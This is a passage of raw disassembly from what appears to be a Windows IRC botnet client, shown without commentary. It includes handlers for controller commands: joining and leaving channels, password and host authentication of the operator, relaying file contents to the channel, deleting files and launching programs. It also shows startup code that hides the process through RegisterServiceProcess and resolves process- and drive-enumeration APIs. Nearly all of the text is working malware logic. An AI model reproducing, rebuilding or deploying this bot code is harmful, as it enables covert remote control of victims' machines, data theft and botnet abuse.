add esp, 28h
loc_409229: ; CODE XREF: sub_401CC7+7522�j
inc [ebp+Source]
cmp [ebp+Source], 0Ah
jl short loc_4091C6
lea eax, [ebp+Dst]
push offset asc_443470 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_409245: ; CODE XREF: sub_401CC7+74F6�j
push offset aFrame ; "frame"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4092E5
cmp [ebp+esi+Format], ebx
jz short loc_4092D2
cmp [ebp+esi+Str2], ebx
jz short loc_4092D2
cmp [ebp+esi+var_80], ebx
jz short loc_4092D2
mov eax, [ebp+esi+var_7C]
cmp eax, ebx
jz short loc_4092D2
push eax ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+var_80] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Str2] ; Str
call _atoi
pop ecx
push eax ; Size
push [ebp+esi+Format] ; int
call sub_416191
add esp, 10h
test eax, eax
jnz short loc_4092CB
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset asc_4434A0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4092E5
; ---------------------------------------------------------------------------
loc_4092CB: ; CODE XREF: sub_401CC7+75E5�j
push offset unk_4434CC
jmp short loc_4092D7
; ---------------------------------------------------------------------------
loc_4092D2: ; CODE XREF: sub_401CC7+759A�j
; sub_401CC7+75A3�j ...
push offset asc_443500 ; "-"
loc_4092D7: ; CODE XREF: sub_401CC7+7609�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4092E5: ; CODE XREF: sub_401CC7+758D�j
; sub_401CC7+7602�j
push offset aVideo ; "video"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408AA2
mov eax, [ebp+esi+Format]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_40937B
mov eax, [ebp+esi+Str2]
cmp eax, ebx
mov [ebp+Src], eax
jz short loc_40937B
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_1C], eax
jz short loc_40937B
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
jz short loc_40937B
mov esi, [ebp+esi+var_78]
cmp esi, ebx
jz short loc_40937B
push esi ; Str
call _atoi
pop ecx
push eax ; int
push edi ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+arg_1C] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+Src] ; Str
call _atoi
pop ecx
push eax ; Size
push [ebp+arg_18] ; int
call sub_41638A
add esp, 14h
test eax, eax
jnz short loc_409371
push [ebp+arg_18]
push offset unk_443540
jmp loc_408A93
; ---------------------------------------------------------------------------
loc_409371: ; CODE XREF: sub_401CC7+769B�j
push offset unk_44356C
jmp loc_409437
; ---------------------------------------------------------------------------
loc_40937B: ; CODE XREF: sub_401CC7+763F�j
; sub_401CC7+764D�j ...
push offset unk_4435AC
jmp loc_409437
; ---------------------------------------------------------------------------
loc_409385: ; CODE XREF: sub_401CC7+40C0�j
; sub_401CC7+40D7�j
push offset aR_0 ; "r"
push edi ; Filename
call _fopen
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4093F1
mov ebx, 200h
push esi
lea eax, [ebp+Dst]
push ebx
push eax
call sub_41FDD0
add esp, 0Ch
loc_4093AE: ; CODE XREF: sub_401CC7+7716�j
test eax, eax
jz short loc_4093DF
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
push esi
lea eax, [ebp+Dst]
push ebx
push eax
call sub_41FDD0
add esp, 20h
jmp short loc_4093AE
; ---------------------------------------------------------------------------
loc_4093DF: ; CODE XREF: sub_401CC7+76E9�j
push esi ; File
call _fclose
pop ecx
push edi
push offset unk_442D98
jmp loc_409575
; ---------------------------------------------------------------------------
loc_4093F1: ; CODE XREF: sub_401CC7+76CF�j
push edi
push offset unk_442DBC
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4093FC: ; CODE XREF: sub_401CC7+4092�j
; sub_401CC7+40A9�j
cmp [ebp+var_C], ebx
jz loc_409B47
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B47
push offset asc_442D3C ; "\n"
push esi ; Dest
call _strcat
push esi ; Str
call sub_41A969
add esp, 0Ch
test eax, eax
jnz short loc_40944A
push offset asc_442D40 ; "-"
loc_409437: ; CODE XREF: sub_401CC7+76AF�j
; sub_401CC7+76B9�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_408AA2
; ---------------------------------------------------------------------------
loc_40944A: ; CODE XREF: sub_401CC7+7769�j
push esi
lea eax, [ebp+Dst]
push offset asc_442D6C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_408AC3
; ---------------------------------------------------------------------------
loc_409464: ; CODE XREF: sub_401CC7+4064�j
; sub_401CC7+407B�j
cmp [ebp+var_C], ebx
jz loc_409B47
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_409B47
push eax ; Format
call sub_418F62
test eax, eax
pop ecx
jnz short loc_409492
push offset unk_442CF8
jmp short loc_409437
; ---------------------------------------------------------------------------
loc_409492: ; CODE XREF: sub_401CC7+77C2�j
push offset dword_442D18
jmp short loc_409437
; ---------------------------------------------------------------------------
loc_409499: ; CODE XREF: sub_401CC7+4036�j
; sub_401CC7+404D�j
push 7Fh ; Count
lea eax, [ebp+var_2080]
push edi ; Source
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+Format]
add esp, 0Ch
cmp esi, ebx
jz short loc_4094C8
push 7Fh ; Count
lea eax, [ebp+var_2000]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_4094C8: ; CODE XREF: sub_401CC7+77ED�j
push 7Fh ; Count
lea eax, [ebp+var_1F80]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_2084], eax
mov eax, [ebp+var_8]
mov [ebp+var_1EFC], eax
mov eax, [ebp+var_4]
mov [ebp+var_1EF8], eax
push edi
lea eax, [ebp+Dst]
push offset asc_442C90 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ch ; int
push eax ; Source
call sub_40B78E
add esp, 18h
mov [ebp+var_1F00], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2084]
push ebx
push eax
push offset loc_41BCDD
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1F00]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_409569
loc_409553: ; CODE XREF: sub_401CC7+78A0�j
cmp [ebp+var_1EF4], ebx
jnz loc_407049
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_409553
; ---------------------------------------------------------------------------
loc_409569: ; CODE XREF: sub_401CC7+788A�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset asc_442CA8 ; "-"
loc_409575: ; CODE XREF: sub_401CC7+29C3�j
; sub_401CC7+7725�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_407049
; ---------------------------------------------------------------------------
loc_409589: ; CODE XREF: sub_401CC7+4008�j
; sub_401CC7+401F�j
push ebx ; Source
push [ebp+Format] ; int
push [ebp+arg_4] ; int
push edi ; Str
call sub_410423
add esp, 10h
push edi
push offset dword_442C6C
jmp loc_409B40
; ---------------------------------------------------------------------------
loc_4095A7: ; CODE XREF: sub_401CC7+3FDA�j
; sub_401CC7+3FF1�j
push 14h ; Size
lea eax, [ebp+var_1D48]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_1D34]
push edi
push offset aS_34 ; "%s"
push eax ; Dest
call _sprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1D50], eax
lea eax, [ebp+var_C0]
push eax ; Format
lea eax, [ebp+var_1C30]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1BA8], eax
mov eax, [ebp+var_8]
mov [ebp+var_1BA4], eax
lea eax, [ebp+var_1C30]
push eax
lea eax, [ebp+var_1D34]
push eax
lea eax, [ebp+Dst]
push offset asc_442C00 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ah ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_1BAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1D50]
push ebx
push eax
push offset sub_4169B8
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1BAC]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_409680
loc_40966A: ; CODE XREF: sub_401CC7+79B7�j
cmp [ebp+var_1BA0], ebx
jnz loc_408708
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40966A
; ---------------------------------------------------------------------------
loc_409680: ; CODE XREF: sub_401CC7+79A1�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_442C24
jmp loc_4086F9
; ---------------------------------------------------------------------------
loc_409691: ; CODE XREF: sub_401CC7+3FAC�j
; sub_401CC7+3FC3�j
push edi
call ds:dword_4F6388 ; DeleteFileA
test eax, eax
jz short loc_4096B8
push edi
push offset asc_442BCC ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_40978B
; ---------------------------------------------------------------------------
loc_4096B8: ; CODE XREF: sub_401CC7+79D3�j
push offset dword_442BE8
call sub_418E9D
pop ecx
push eax
jmp loc_404101
; ---------------------------------------------------------------------------
loc_4096C9: ; CODE XREF: sub_401CC7+3F7E�j
; sub_401CC7+3F95�j
push edi ; Str
call _atoi
push eax
call sub_41A8E2
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_4096E6
push offset unk_442B6C
jmp short loc_4096EB
; ---------------------------------------------------------------------------
loc_4096E6: ; CODE XREF: sub_401CC7+7A16�j
push offset asc_442B90 ; "-"
loc_4096EB: ; CODE XREF: sub_401CC7+7A1D�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_40704C
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
jmp loc_40704C
; ---------------------------------------------------------------------------
loc_409724: ; CODE XREF: sub_401CC7+3F50�j
; sub_401CC7+3F67�j
push ebx ; int
push ebx ; int
push edi ; Str2
push [ebp+var_4] ; int
push ebx ; Str
push [ebp+arg_4] ; int
call sub_41A5C1
add esp, 18h
cmp eax, 1
push edi
jnz short loc_409746
push offset unk_442B10
jmp loc_407019
; ---------------------------------------------------------------------------
loc_409746: ; CODE XREF: sub_401CC7+7A73�j
push offset unk_442B30
jmp loc_407019
; ---------------------------------------------------------------------------
loc_409750: ; CODE XREF: sub_401CC7+3F22�j
; sub_401CC7+3F39�j
push edi
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_2D4], eax
jz short loc_409793
push 2
lea eax, [ebp+var_2D4]
push 4
push eax
call dword_4E41D8 ; gethostbyaddr
cmp eax, ebx
jz short loc_4097B4
push dword ptr [eax]
push edi
push offset asc_442A98 ; "-"
loc_40977F: ; CODE XREF: sub_401CC7+7AEB�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
loc_40978B: ; CODE XREF: sub_401CC7+79EC�j
add esp, 10h
jmp loc_407028
; ---------------------------------------------------------------------------
loc_409793: ; CODE XREF: sub_401CC7+7A99�j
push edi
call dword_4E42A4 ; gethostbyname
cmp eax, ebx
jz short loc_4097B4
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_4E42AC ; inet_ntoa
push eax
push edi
push offset unk_442AB8
jmp short loc_40977F
; ---------------------------------------------------------------------------
loc_4097B4: ; CODE XREF: sub_401CC7+7AAE�j
; sub_401CC7+7AD5�j
push offset unk_442AD8
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_4097BE: ; CODE XREF: sub_401CC7+3EF4�j
; sub_401CC7+3F0B�j
push 7Fh ; Count
push edi ; Source
push [ebp+arg_14] ; Dest
call _strncpy
add esp, 0Ch
push edi
push offset unk_442A68
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_4097D7: ; CODE XREF: sub_401CC7+3EC6�j
; sub_401CC7+3EDD�j
push 5
push ebx
push ebx
push edi
push offset aOpen_1 ; "open"
push ebx
call dword_4E418C
test eax, eax
push edi
jz short loc_4097F7
push offset unk_442A18
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4097F7: ; CODE XREF: sub_401CC7+7B24�j
push offset unk_442A38
jmp loc_407019
; ---------------------------------------------------------------------------
loc_409801: ; CODE XREF: sub_401CC7+3E98�j
; sub_401CC7+3EAF�j
mov al, [edi]
mov byte_440090, al
movsx eax, byte ptr [edi]
push eax
push offset unk_4429DC
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_409816: ; CODE XREF: sub_401CC7+3E6A�j
; sub_401CC7+3E81�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40B487
add esp, 10h
push eax
lea eax, [ebp+Dst]
push offset aNickS_6 ; "NICK %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
push offset aS_19 ; "%s\r\n"
jmp loc_408CE7
; ---------------------------------------------------------------------------
loc_409870: ; CODE XREF: sub_401CC7+3E3C�j
; sub_401CC7+3E53�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_402166
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_402166
push offset aQuitLater_0 ; "QUIT :later\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax] ; int
call sub_409D26
pop ecx
pop ecx
push 1F4h
call ds:dword_4F6380 ; Sleep
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax]
call dword_4E42B8 ; closesocket
push [ebp+var_10]
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_45713C[eax]
call ds:dword_4F63B4 ; TerminateThread
push edi ; Str
call _atoi
imul eax, 234h
push edi ; Str
mov dword_45713C[eax], ebx
call _atoi
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_456F28[eax], bl
jmp loc_402166
; ---------------------------------------------------------------------------
loc_40991B: ; CODE XREF: sub_401CC7+3E0E�j
; sub_401CC7+3E25�j
push edi ; Str2
push offset aAll ; "all"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40994A
call sub_40B957
cmp eax, ebx
jle short loc_409940
push eax
push offset unk_4428F0
jmp loc_407669
; ---------------------------------------------------------------------------
loc_409940: ; CODE XREF: sub_401CC7+7C6C�j
push offset unk_442918
jmp loc_4041A3
; ---------------------------------------------------------------------------
loc_40994A: ; CODE XREF: sub_401CC7+7C63�j
mov eax, [ebp+var_A4]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_402166
lea eax, [ebp+edi*4+var_90]
mov [ebp+File], eax
loc_409966: ; CODE XREF: sub_401CC7+7D10�j
mov eax, [ebp+File]
mov esi, [eax]
cmp esi, ebx
jz loc_402166
push esi ; Str
call _atoi
push eax
call sub_40B8C9
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_40998D
push offset unk_442940
jmp short loc_409992
; ---------------------------------------------------------------------------
loc_40998D: ; CODE XREF: sub_401CC7+7CBD�j
push offset asc_442964 ; "-"
loc_409992: ; CODE XREF: sub_401CC7+7CC4�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4099C2
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_4099C2: ; CODE XREF: sub_401CC7+7CDD�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
add [ebp+File], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_409966
jmp loc_402166
; ---------------------------------------------------------------------------
loc_4099DE: ; CODE XREF: sub_401CC7+3DE0�j
; sub_401CC7+3DF7�j
cmp [ebp+var_C], ebx
jz loc_409B47
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B47
push esi ; Args
push offset aS_20 ; "%s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
push esi
push offset dword_4428C0
jmp loc_409B40
; ---------------------------------------------------------------------------
loc_409A18: ; CODE XREF: sub_401CC7+3DB2�j
; sub_401CC7+3DC9�j
push edi ; Args
push offset aPartS_2 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
push edi
push offset unk_44288C
jmp loc_409B40
; ---------------------------------------------------------------------------
loc_409A34: ; CODE XREF: sub_401CC7+3D84�j
; sub_401CC7+3D9B�j
push [ebp+esi+Format]
push edi ; Args
push offset aJoinSS_3 ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 10h
push edi
push offset unk_442850
jmp loc_409B40
; ---------------------------------------------------------------------------
loc_409A57: ; CODE XREF: sub_401CC7+3D56�j
; sub_401CC7+3D6D�j
push edi ; Args
push offset aNickS_7 ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
push edi
push offset unk_442810
jmp loc_409B40
; ---------------------------------------------------------------------------
loc_409A73: ; CODE XREF: sub_401CC7+317E�j
; sub_401CC7+3195�j
push offset aQuitReconnec_0 ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409D26
pop ecx
lea eax, [ebp+Dst]
pop ecx
push edi
push offset asc_4424A0 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C77
push edi ; Str
call _atoi
add esp, 14h
loc_409AA9: ; CODE XREF: sub_401CC7+7E2C�j
push eax
call ds:dword_4F6380 ; Sleep
loc_409AB0: ; CODE XREF: sub_401CC7+2A97�j
xor eax, eax
jmp loc_402169
; ---------------------------------------------------------------------------
loc_409AB7: ; CODE XREF: sub_401CC7+3150�j
; sub_401CC7+3167�j
push offset aQuitReconnec_1 ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409D26
pop ecx
lea eax, [ebp+Dst]
pop ecx
push edi
push offset asc_442448 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C77
push edi ; Str
call _atoi
add esp, 14h
imul eax, 3E8h
jmp short loc_409AA9
; ---------------------------------------------------------------------------
loc_409AF5: ; CODE XREF: sub_401CC7+E9D�j
; sub_401CC7+EB2�j
push dword ptr [ebp+esi+Args] ; Str1
xor eax, eax
cmp [ebp+var_8F0], bl
setnz al
push eax ; int
lea eax, [ebp+Str1]
push dword_440098 ; int
push eax ; Dest
call sub_40B487
add esp, 10h
lea eax, [ebp+Str1]
push eax ; Args
push offset aNickS_8 ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
lea eax, [ebp+Str1]
push eax ; Args
push offset asc_4410A4 ; "-"
loc_409B40: ; CODE XREF: sub_401CC7+7222�j
; sub_401CC7+78DB�j ...
call sub_415CEB
pop ecx
loc_409B46: ; CODE XREF: sub_401CC7+6E08�j
pop ecx
loc_409B47: ; CODE XREF: sub_401CC7+624�j
; sub_401CC7+630�j ...
mov eax, [ebp+File]
jmp loc_402169
; ---------------------------------------------------------------------------
loc_409B4F: ; CODE XREF: sub_401CC7+A80�j
; sub_401CC7+A95�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+arg_20], esi
jz loc_402166
cmp [ebp+var_A8], ebx
jnz loc_402166
push offset asc_440EE8 ; "!"
push [ebp+var_90] ; Str
call _strtok
mov esi, eax
push offset byte_4E40C0 ; Delim
push ebx ; Str
inc esi
call _strtok
push offset asc_440EEC ; "~"
push eax ; Str
call _strtok
push [ebp+arg_20] ; Str2
mov edi, eax
push offset aIkke ; "ikke"
call _strcmp
add esp, 20h
test eax, eax
jz short loc_409BEE
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 14h
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
push edi
push esi
push offset unk_440F44
jmp loc_4025D0
; ---------------------------------------------------------------------------
loc_409BEE: ; CODE XREF: sub_401CC7+7EE3�j
mov [ebp+File], offset off_440130
loc_409BF5: ; CODE XREF: sub_401CC7+7F4A�j
mov eax, [ebp+File]
push edi
push dword ptr [eax]
call sub_40BAE7
pop ecx
test eax, eax
pop ecx
jnz short loc_409C55
add [ebp+File], 4
cmp [ebp+File], offset off_440134
jb short loc_409BF5
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 14h
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSYourA_0 ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
push edi
push esi
push offset unk_440FC4
jmp loc_4025D0
; ---------------------------------------------------------------------------
loc_409C55: ; CODE XREF: sub_401CC7+7F3D�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409C5A: ; CODE XREF: sub_401CC7+7FBD�j
cmp [ebp+arg_20], ebx
jz loc_402166
cmp [edi], bl
jnz short loc_409C7A
push [ebp+arg_20] ; Str2
push offset aIkke ; "ikke"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409C8B
loc_409C7A: ; CODE XREF: sub_401CC7+7F9E�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_409C5A
jmp loc_402166
; ---------------------------------------------------------------------------
loc_409C8B: ; CODE XREF: sub_401CC7+7FB1�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_E00]
push 7Fh ; Count
push eax ; Source
push esi ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_409CC2
push ebx ; int
push [ebp+var_4] ; int
push offset unk_440FF0 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_409CC2: ; CODE XREF: sub_401CC7+7FDF�j
lea eax, [ebp+var_C0]
push eax ; Args
push offset asc_441010 ; "-"
loc_409CCE: ; CODE XREF: sub_401CC7+58D�j
; sub_401CC7+28C1�j ...
call sub_415CEB
loc_409CD3: ; CODE XREF: sub_401CC7+1B9B�j
pop ecx
loc_409CD4: ; CODE XREF: sub_401CC7+2517�j
pop ecx
jmp loc_402166
; ---------------------------------------------------------------------------
loc_409CDA: ; CODE XREF: sub_401CC7+205�j
; sub_401CC7+21A�j
push [ebp+Source] ; Args
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
push offset aXI ; "-x+i"
push [ebp+Source] ; Args
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS_4 ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 10h
mov dword_4E40B0, edi
jmp loc_401F5B
sub_401CC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409D26(int,char *Format,char Args)
sub_409D26 proc near ; CODE XREF: sub_401B4F+3D�p
; sub_401CC7+1C2�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Format = dword ptr 0Ch
Args = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 200h ; Count
push eax ; Dest
call __vsnprintf
add esp, 10h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
leave
retn
sub_409D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409D6C(int,char *Str,int,int,int)
sub_409D6C proc near ; CODE XREF: sub_401CC7+4FD�p
; sub_401CC7+133E�p ...
var_400 = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice_3 ; "NOTICE"
jnz short loc_409D87
mov edi, offset aPrivmsg_2 ; "PRIVMSG"
loc_409D87: ; CODE XREF: sub_409D6C+14�j
push edi ; Str
call _strlen
push [ebp+Str] ; Str
mov esi, 1FAh
sub esi, eax
call _strlen
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_21 ; "%s"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+Dest]
push [ebp+Str]
push edi
push offset aSSS_1 ; "%s %s :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_409E0A
push 7D0h
call ds:dword_4F6380 ; Sleep
locret_409E0A: ; CODE XREF: sub_409D6C+91�j
leave
retn
sub_409D6C endp
; =============== S U B R O U T I N E =======================================
sub_409E0C proc near ; CODE XREF: WinMain(x,x,x,x)+4B�p
push ebx
push ebp
mov ebp, ds:dword_4F63A4
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_4F63C4
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_409F2C
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4E42CC, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4E4240, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4E4224, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4E4134, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4E40E0, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4E4110, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4E4188, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_4E4280, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4E42DC, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4E4140, eax
call esi ; GetProcAddress
cmp dword_4E42CC, ebx
mov dword_4E4128, eax
jz short loc_409F0A
cmp dword_4E4240, ebx
jz short loc_409F0A
cmp dword_4E4224, ebx
jz short loc_409F0A
cmp dword_4E4134, ebx
jz short loc_409F0A
cmp dword_4E4110, ebx
jz short loc_409F0A
cmp dword_4E4188, ebx
jz short loc_409F0A
cmp dword_4E4280, ebx
jz short loc_409F0A
cmp dword_4E42DC, ebx
jz short loc_409F0A
cmp dword_4E4140, ebx
jz short loc_409F0A
cmp eax, ebx
jnz short loc_409F14
loc_409F0A: ; CODE XREF: sub_409E0C+B8�j
; sub_409E0C+C0�j ...
mov dword_4E42E0, 1
loc_409F14: ; CODE XREF: sub_409E0C+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4E4258, eax
jz short loc_409F41
push 1
push ebx
call eax
jmp short loc_409F41
; ---------------------------------------------------------------------------
loc_409F2C: ; CODE XREF: sub_409E0C+1D�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E42E4, eax
mov dword_4E42E0, 1
loc_409F41: ; CODE XREF: sub_409E0C+117�j
; sub_409E0C+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_4F63C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A056
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4E427C, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
